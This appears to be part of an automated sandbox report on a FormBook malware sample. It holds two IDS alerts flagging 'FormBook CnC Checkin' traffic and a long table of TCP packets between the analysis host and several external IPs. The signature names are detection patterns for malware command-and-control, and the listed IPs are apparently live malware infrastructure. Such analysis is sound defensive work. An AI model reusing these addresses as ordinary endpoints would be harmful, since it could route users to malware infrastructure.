                                                                                                                  2024-10-08T15:41:04.179629+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550023199.59.243.22780TCP
                                                                                                                  2024-10-08T15:41:04.179629+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550023199.59.243.22780TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Oct 8, 2024 15:37:50.339101076 CEST4986380192.168.2.544.213.25.70
                                                                                                                  Oct 8, 2024 15:37:50.344707966 CEST804986344.213.25.70192.168.2.5
                                                                                                                  Oct 8, 2024 15:37:50.344803095 CEST4986380192.168.2.544.213.25.70
                                                                                                                  Oct 8, 2024 15:37:50.352426052 CEST4986380192.168.2.544.213.25.70
                                                                                                                  Oct 8, 2024 15:37:50.358045101 CEST804986344.213.25.70192.168.2.5
                                                                                                                  Oct 8, 2024 15:37:51.485133886 CEST804986344.213.25.70192.168.2.5
                                                                                                                  Oct 8, 2024 15:37:51.503470898 CEST804986344.213.25.70192.168.2.5
                                                                                                                  Oct 8, 2024 15:37:51.503690004 CEST804986344.213.25.70192.168.2.5
                                                                                                                  Oct 8, 2024 15:37:51.503796101 CEST4986380192.168.2.544.213.25.70
                                                                                                                  Oct 8, 2024 15:37:51.565694094 CEST4986380192.168.2.544.213.25.70
                                                                                                                  Oct 8, 2024 15:37:51.570528984 CEST804986344.213.25.70192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:07.073086023 CEST4995680192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:07.078619003 CEST8049956206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:07.078686953 CEST4995680192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:07.089812040 CEST4995680192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:07.094835043 CEST8049956206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:08.600827932 CEST4995680192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:08.607099056 CEST8049956206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:08.609265089 CEST4995680192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:09.616691113 CEST4997380192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:09.622075081 CEST8049973206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:09.622198105 CEST4997380192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:09.632733107 CEST4997380192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:09.637938023 CEST8049973206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:10.550307989 CEST8049973206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:10.550445080 CEST8049973206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:10.550616026 CEST4997380192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:11.144995928 CEST4997380192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:12.165781975 CEST4997880192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:12.171040058 CEST8049978206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:12.171127081 CEST4997880192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:12.182101965 CEST4997880192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:12.187084913 CEST8049978206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:12.187160015 CEST8049978206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:13.091316938 CEST8049978206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:13.144830942 CEST4997880192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:13.326689005 CEST8049978206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:13.326765060 CEST4997880192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:13.694546938 CEST4997880192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:14.710793972 CEST4997980192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:14.715961933 CEST8049979206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:14.716053963 CEST4997980192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:14.722811937 CEST4997980192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:14.727768898 CEST8049979206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:15.641633987 CEST8049979206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:15.642920017 CEST8049979206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:15.642976046 CEST4997980192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:15.644242048 CEST4997980192.168.2.5206.119.82.134
                                                                                                                  Oct 8, 2024 15:38:15.649076939 CEST8049979206.119.82.134192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:20.776314020 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:20.781615019 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:20.781687975 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:20.794939995 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:20.801285028 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.384052992 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.384069920 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.384082079 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.384094000 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.384105921 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.384115934 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.384141922 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.384366035 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.384404898 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.384598017 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.384610891 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.384659052 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.385274887 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.385665894 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.385715008 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.390625000 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.390800953 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.390811920 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.390850067 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.473818064 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.473839045 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.473855019 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.473890066 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.473937988 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.473983049 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.474137068 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.474488020 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.474535942 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.474541903 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.474574089 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.474617958 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.475048065 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.475059986 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.475073099 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.475097895 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.475243092 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.475296021 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.475903034 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.475914001 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.475925922 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.475959063 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.476167917 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.476213932 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:22.301280975 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.320065975 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.334474087 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.334554911 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.349253893 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.354178905 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.946433067 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.946451902 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.946464062 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.946553946 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.946588993 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.946629047 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.946636915 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.946640015 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.946682930 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.947055101 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.947066069 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.947081089 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.947089911 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.947134018 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.949429035 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.951884031 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.951942921 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.951951981 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.951958895 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.952009916 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.952009916 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.037367105 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037388086 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037398100 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037601948 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.037615061 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037625074 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037692070 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.037781954 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037791014 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037801027 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037831068 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.037862062 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.037866116 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037877083 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037919044 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.038687944 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.038697004 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.038707018 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.038727045 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.038736105 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.038768053 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.039232016 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.039410114 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.039486885 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.879319906 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:25.914408922 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:25.919692039 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:25.919797897 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:25.930362940 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:25.935446978 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:25.935465097 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.501810074 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.501868010 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.501885891 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.501909971 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.501928091 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.501961946 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.502152920 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.502182007 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.502198935 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.502201080 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.502243042 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.502258062 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.502286911 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.502365112 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.506917000 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.506933928 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.506947041 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.507038116 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.507047892 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.507107019 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.588150024 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588191986 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588202000 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588257074 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.588344097 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588355064 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588396072 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.588557959 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588599920 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588610888 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588610888 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.588648081 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.588679075 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.589236975 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.589273930 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.589282036 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.589293957 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.589334965 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.589438915 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.589449883 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.589490891 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.590096951 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.590172052 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.590218067 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:27.441776037 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:28.460439920 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:28.466097116 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:28.466216087 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:28.472740889 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:28.478013039 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065129995 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065192938 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065254927 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065289974 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065298080 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.065357924 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.065440893 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065500975 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065536976 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065566063 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065572023 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.065598965 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065612078 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.065635920 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065685987 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.070810080 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.070864916 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.070905924 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.070936918 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.113600016 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.153598070 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.153635979 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.153659105 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.153680086 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.153708935 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.153832912 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.153855085 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.153858900 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.153877974 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.154059887 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.154215097 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.154252052 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.154297113 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.154738903 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.154839039 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.154872894 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.154889107 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.154907942 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.154943943 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.154956102 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.155538082 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.155594110 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.157953024 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.162904978 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:42.261766911 CEST4998480192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:42.267031908 CEST80499843.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:42.267122984 CEST4998480192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:42.277132988 CEST4998480192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:42.282010078 CEST80499843.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:42.752520084 CEST80499843.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:42.752643108 CEST4998480192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:43.785542965 CEST4998480192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:43.790781975 CEST80499843.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:44.804389000 CEST4998580192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:44.809382915 CEST80499853.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:44.809495926 CEST4998580192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:44.820225954 CEST4998580192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:44.825136900 CEST80499853.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:45.280067921 CEST80499853.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:45.280121088 CEST4998580192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:46.335268021 CEST4998580192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:46.340416908 CEST80499853.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:47.364521980 CEST4998680192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:47.369848013 CEST80499863.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:47.369925976 CEST4998680192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:47.385597944 CEST4998680192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:47.390750885 CEST80499863.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:47.391345978 CEST80499863.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:47.853693008 CEST80499863.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:47.853763103 CEST4998680192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:48.899422884 CEST4998680192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:48.904699087 CEST80499863.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:49.913604021 CEST4998780192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:49.918545961 CEST80499873.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:49.918642998 CEST4998780192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:49.925474882 CEST4998780192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:49.930408001 CEST80499873.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:50.414079905 CEST80499873.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:50.414374113 CEST80499873.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:50.414469004 CEST4998780192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:50.417133093 CEST4998780192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:38:50.422090054 CEST80499873.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:55.961447001 CEST4998880192.168.2.5183.181.83.131
                                                                                                                  Oct 8, 2024 15:38:55.966387033 CEST8049988183.181.83.131192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:55.966449976 CEST4998880192.168.2.5183.181.83.131
                                                                                                                  Oct 8, 2024 15:38:55.979124069 CEST4998880192.168.2.5183.181.83.131
                                                                                                                  Oct 8, 2024 15:38:55.984055042 CEST8049988183.181.83.131192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:56.865907907 CEST8049988183.181.83.131192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:56.865984917 CEST8049988183.181.83.131192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:56.865997076 CEST8049988183.181.83.131192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:56.866009951 CEST8049988183.181.83.131192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:56.866055965 CEST8049988183.181.83.131192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:56.866069078 CEST8049988183.181.83.131192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:56.866079092 CEST8049988183.181.83.131192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:56.866137028 CEST4998880192.168.2.5183.181.83.131
                                                                                                                  Oct 8, 2024 15:38:56.866137028 CEST4998880192.168.2.5183.181.83.131
                                                                                                                  Oct 8, 2024 15:38:56.866137028 CEST4998880192.168.2.5183.181.83.131
                                                                                                                  Oct 8, 2024 15:38:57.488601923 CEST4998880192.168.2.5183.181.83.131
                                                                                                                  Oct 8, 2024 15:38:58.507119894 CEST4998980192.168.2.5183.181.83.131
                                                                                                                  Oct 8, 2024 15:38:58.512202024 CEST8049989183.181.83.131192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:58.515175104 CEST4998980192.168.2.5183.181.83.131
